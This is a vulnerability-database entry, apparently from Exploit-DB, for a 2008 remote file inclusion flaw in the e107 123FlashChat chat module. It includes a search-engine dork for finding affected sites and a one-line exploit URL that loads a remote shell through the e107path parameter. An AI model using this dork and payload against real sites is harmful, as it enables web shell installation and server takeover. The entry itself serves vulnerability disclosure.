E107 Chat Module 123FlashChat Remote File Inclusion Vulnerability

vendor:

123FlashChat

by:

by_casper41

9.3

CVSS

HIGH

Remote File Inclusion

CWE

Product Name: 123FlashChat

Affected Version From: 6.8.2000

Affected Version To: 6.8.2000

Patch Exists: YES

Related CWE: N/A

CPE: a:123flashchat:123flashchat

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: None

2008

E107 Chat Module 123FlashChat Remote File Inclusion Vulnerability

A vulnerability in the E107 Chat Module 123FlashChat allows remote attackers to include arbitrary files via the e107path parameter in a 123flashchat.php request.

Mitigation:

Input validation should be used to prevent the inclusion of arbitrary files.

Source

Exploit-DB raw data:

###############################################################
#
# E107 Chat Module 123FlashChat Remote File Inclusion Vulnerability
#
#########################################################
#
# AUTHOR   : by_casper41
#
# Mekan       : Cyber-Warrior.Org
#
# MAÄ°L        : CWCasper@hotmail.com        
#
##########################################################
#
# Download: http://www.123flashchat.com/download/e107_mod_for_123flashchat_6.8.0.zip
#
##########################################################
# DORKS : "123flashchat.php"
##########################################################
#
# EXPLOITS :
# Http://localhost/path/123flashchat.php?e107path=Sh3LL
#
################################################################ 

# milw0rm.com [2008-04-17]